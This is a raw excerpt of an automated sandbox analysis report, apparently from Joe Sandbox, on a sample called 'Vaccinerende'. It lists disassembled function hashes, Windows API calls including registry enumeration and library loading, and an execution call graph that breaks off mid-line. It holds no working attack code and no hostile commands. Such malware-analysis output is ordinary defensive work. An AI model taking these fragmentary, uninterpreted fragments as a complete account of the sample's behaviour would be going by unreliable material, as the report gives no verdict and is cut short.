                                            • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                            • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                            • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                            • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                            APIs
                                            • _snwprintf.MSVCRT ref: 0040A398
                                            • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _snwprintfmemcpy
                                            • String ID: %2.2X
                                            • API String ID: 2789212964-323797159
                                            • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                            • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                            • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                            • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _snwprintf
                                            • String ID: %%-%d.%ds
                                            • API String ID: 3988819677-2008345750
                                            • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                            • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                            • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                            • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                            APIs
                                            • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                            • memset.MSVCRT ref: 00401917
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: PlacementWindowmemset
                                            • String ID: WinPos
                                            • API String ID: 4036792311-2823255486
                                            • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                            • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                            • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                            • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                            APIs
                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                            • wcsrchr.MSVCRT ref: 0040DCE9
                                            • wcscat.MSVCRT ref: 0040DCFF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FileModuleNamewcscatwcsrchr
                                            • String ID: _lng.ini
                                            • API String ID: 383090722-1948609170
                                            • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                            • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                            • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                            • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                            APIs
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                            • String ID: SHGetSpecialFolderPathW$shell32.dll
                                            • API String ID: 2773794195-880857682
                                            • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                            • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                            • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                            • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                            APIs
                                            • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                            • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: LongWindow
                                            • String ID: MZ@
                                            • API String ID: 1378638983-2978689999
                                            • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                            • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                            • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                            • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                            APIs
                                            • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                            • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                            • memset.MSVCRT ref: 0042BAAE
                                            • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy$memset
                                            • String ID:
                                            • API String ID: 438689982-0
                                            • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                            • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                            • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                            • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                            APIs
                                              • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??2@$memset
                                            • String ID:
                                            • API String ID: 1860491036-0
                                            • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                            • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                            • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                            • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                            APIs
                                            • wcslen.MSVCRT ref: 0040A8E2
                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                            • free.MSVCRT ref: 0040A908
                                            • free.MSVCRT ref: 0040A92B
                                            • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: free$memcpy$mallocwcslen
                                            • String ID:
                                            • API String ID: 726966127-0
                                            • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                            • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                            • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                            • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                            APIs
                                            • wcslen.MSVCRT ref: 0040B1DE
                                            • free.MSVCRT ref: 0040B201
                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                            • free.MSVCRT ref: 0040B224
                                            • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: free$memcpy$mallocwcslen
                                            • String ID:
                                            • API String ID: 726966127-0
                                            • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                            • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                            • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                            • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                            APIs
                                            • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                              • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                            • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                            • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                            • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcmp$memcpy
                                            • String ID:
                                            • API String ID: 231171946-0
                                            • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                            • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                            • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                            • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                            APIs
                                            • strlen.MSVCRT ref: 0040B0D8
                                            • free.MSVCRT ref: 0040B0FB
                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                            • free.MSVCRT ref: 0040B12C
                                            • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: free$memcpy$mallocstrlen
                                            • String ID:
                                            • API String ID: 3669619086-0
                                            • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                            • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                            • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                            • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                            • malloc.MSVCRT ref: 00417407
                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                            • free.MSVCRT ref: 00417425
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$freemalloc
                                            • String ID:
                                            • API String ID: 2605342592-0
                                            • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                            • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                            • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                            • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: wcslen$wcscat$wcscpy
                                            • String ID:
                                            • API String ID: 1961120804-0
                                            • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                            • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                            • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                            • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                            Execution Graph

                                            Execution Coverage:2.4%
                                            Dynamic/Decrypted Code Coverage:19.9%
                                            Signature Coverage:0.5%
                                            Total number of Nodes:869
                                            Total number of Limit Nodes:22
33207->33209 33211 401f28 33207->33211 33358 4070e3 strlen _mbscat _mbscpy _mbscat 33209->33358 33343 406f81 GetFileAttributesA 33211->33343 33213 401f35 33344 401c31 33213->33344 33216 401f75 33356 410a9c RegOpenKeyExA 33216->33356 33218 401c31 7 API calls 33218->33216 33219 401f91 33220 402187 33219->33220 33221 401f9c memset 33219->33221 33223 402195 ExpandEnvironmentStringsA 33220->33223 33224 4021a8 _strcmpi 33220->33224 33359 410b62 RegEnumKeyExA 33221->33359 33368 406f81 GetFileAttributesA 33223->33368 33224->33114 33224->33115 33226 40217e RegCloseKey 33226->33220 33227 401fd9 atoi 33228 401fef memset memset sprintf 33227->33228 33235 401fc9 33227->33235 33360 410b1e 33228->33360 33231 402165 33231->33226 33232 402076 memset memset strlen strlen 33232->33235 33233 4070e3 strlen _mbscat _mbscpy _mbscat 33233->33235 33234 4020dd strlen strlen 33234->33235 33235->33226 33235->33227 33235->33231 33235->33232 33235->33233 33235->33234 33236 406f81 GetFileAttributesA 33235->33236 33237 402167 _mbscpy 33235->33237 33367 410b62 RegEnumKeyExA 33235->33367 33236->33235 33237->33226 33239 40c422 33238->33239 33240 40c425 _mbscat _mbscpy _mbscpy 33238->33240 33239->33240 33241 40c49d 33240->33241 33242 40c512 33241->33242 33243 40c502 GetWindowPlacement 33241->33243 33244 40c538 33242->33244 33389 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33242->33389 33243->33242 33382 409b31 33244->33382 33248 40ba28 33249 40ba87 33248->33249 33253 40ba3c 33248->33253 33392 406c62 LoadCursorA SetCursor 33249->33392 33251 40ba8c 33393 410a9c RegOpenKeyExA 33251->33393 33394 404785 33251->33394 33397 403c16 33251->33397 33473 4107f1 33251->33473 33476 404734 33251->33476 33252 40ba43 _mbsicmp 33252->33253 33253->33249 33253->33252 33484 40b5e5 10 API calls 33253->33484 33254 40baa0 33255 407e30 _strcmpi 33254->33255 33258 40bab0 33255->33258 33256 40bafa SetCursor 33256->33121 33258->33256 33259 40baf1 qsort 33258->33259 33259->33256 33844 409ded SendMessageA ??2@YAPAXI 
??3@YAXPAX 33265->33844 33267 40b00e 33268 40b016 33267->33268 33269 40b01f GetStdHandle 33267->33269 33845 406d1a CreateFileA 33268->33845 33271 40b01c 33269->33271 33272 40b035 33271->33272 33273 40b12d 33271->33273 33846 406c62 LoadCursorA SetCursor 33272->33846 33850 406d77 9 API calls 33273->33850 33276 40b136 33287 40c580 28 API calls 33276->33287 33277 40b042 33278 40b087 33277->33278 33284 40b0a1 33277->33284 33847 40a57c strlen WriteFile 33277->33847 33278->33284 33848 40a699 12 API calls 33278->33848 33281 40b0d6 33282 40b116 CloseHandle 33281->33282 33283 40b11f SetCursor 33281->33283 33282->33283 33283->33276 33284->33281 33849 406d77 9 API calls 33284->33849 33286->33115 33287->33118 33300 409a32 33288->33300 33291 409c80 memcpy memcpy 33292 409cda 33291->33292 33292->33291 33293 409d18 ??2@YAPAXI ??2@YAPAXI 33292->33293 33294 408db6 12 API calls 33292->33294 33295 409d54 ??2@YAPAXI 33293->33295 33297 409d8b 33293->33297 33294->33292 33295->33297 33297->33297 33310 409b9c 33297->33310 33299 4023c1 33299->33200 33301 409a44 33300->33301 33302 409a3d ??3@YAXPAX 33300->33302 33303 409a52 33301->33303 33304 409a4b ??3@YAXPAX 33301->33304 33302->33301 33305 409a63 33303->33305 33306 409a5c ??3@YAXPAX 33303->33306 33304->33303 33307 409a83 ??2@YAPAXI ??2@YAPAXI 33305->33307 33308 409a73 ??3@YAXPAX 33305->33308 33309 409a7c ??3@YAXPAX 33305->33309 33306->33305 33307->33291 33308->33309 33309->33307 33311 407a55 free 33310->33311 33312 409ba5 33311->33312 33313 407a55 free 33312->33313 33314 409bad 33313->33314 33315 407a55 free 33314->33315 33316 409bb5 33315->33316 33317 407a55 free 33316->33317 33318 409bbd 33317->33318 33319 407a1f 4 API calls 33318->33319 33320 409bd0 33319->33320 33321 407a1f 4 API calls 33320->33321 33322 409bda 33321->33322 33323 407a1f 4 API calls 33322->33323 33324 409be4 33323->33324 33325 407a1f 4 API calls 33324->33325 33326 409bee 33325->33326 33326->33299 33328 410d0e 2 API calls 33327->33328 33329 410dca 33328->33329 33330 
410dfd memset 33329->33330 33369 4070ae 33329->33369 33331 410e1d 33330->33331 33372 410a9c RegOpenKeyExA 33331->33372 33335 401e9e strlen strlen 33335->33203 33335->33204 33336 410e4a 33337 410e7f _mbscpy 33336->33337 33373 410d3d _mbscpy 33336->33373 33337->33335 33339 410e5b 33374 410add RegQueryValueExA 33339->33374 33341 410e73 RegCloseKey 33341->33337 33342->33207 33343->33213 33375 410a9c RegOpenKeyExA 33344->33375 33346 401c4c 33347 401cad 33346->33347 33376 410add RegQueryValueExA 33346->33376 33347->33216 33347->33218 33349 401c6a 33350 401c71 strchr 33349->33350 33351 401ca4 RegCloseKey 33349->33351 33350->33351 33352 401c85 strchr 33350->33352 33351->33347 33352->33351 33353 401c94 33352->33353 33377 406f06 strlen 33353->33377 33355 401ca1 33355->33351 33356->33219 33357->33204 33358->33211 33359->33235 33380 410a9c RegOpenKeyExA 33360->33380 33362 410b34 33363 410b5d 33362->33363 33381 410add RegQueryValueExA 33362->33381 33363->33235 33365 410b4c RegCloseKey 33365->33363 33367->33235 33368->33224 33370 4070bd GetVersionExA 33369->33370 33371 4070ce 33369->33371 33370->33371 33371->33330 33371->33335 33372->33336 33373->33339 33374->33341 33375->33346 33376->33349 33378 406f17 33377->33378 33379 406f1a memcpy 33377->33379 33378->33379 33379->33355 33380->33362 33381->33365 33383 409b40 33382->33383 33385 409b4e 33382->33385 33390 409901 memset SendMessageA 33383->33390 33386 409b99 33385->33386 33387 409b8b 33385->33387 33386->33248 33391 409868 SendMessageA 33387->33391 33389->33244 33390->33385 33391->33386 33392->33251 33393->33254 33395 4047a3 33394->33395 33396 404799 FreeLibrary 33394->33396 33395->33254 33396->33395 33398 4107f1 FreeLibrary 33397->33398 33399 403c30 LoadLibraryA 33398->33399 33400 403c74 33399->33400 33401 403c44 GetProcAddress 33399->33401 33403 4107f1 FreeLibrary 33400->33403 33401->33400 33402 403c5e 33401->33402 33402->33400 33406 403c6b 33402->33406 33404 403c7b 33403->33404 33405 404734 3 API calls 33404->33405 33407 
